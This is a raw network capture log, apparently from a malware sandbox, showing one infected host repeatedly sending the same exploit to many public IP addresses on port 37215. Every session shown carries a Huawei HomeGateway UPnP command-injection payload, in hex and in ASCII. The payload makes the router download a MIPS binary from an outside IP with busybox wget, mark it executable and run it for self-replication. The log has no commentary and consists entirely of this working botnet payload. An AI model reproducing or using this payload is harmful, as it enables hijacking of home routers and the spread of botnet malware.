                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2278192.168.2.1360960157.196.167.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606179953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2279192.168.2.1339398157.218.211.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606297970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2280192.168.2.1341672111.81.59.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606313944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2281192.168.2.1333490197.234.120.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606323004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2282192.168.2.1339090157.243.2.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606362104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2283192.168.2.133833641.221.176.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606401920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2284192.168.2.1348096197.0.19.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606873989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2285192.168.2.1354726197.156.182.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606925964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2286192.168.2.1337414162.186.131.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.606954098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2287192.168.2.1336570157.249.91.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.607004881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 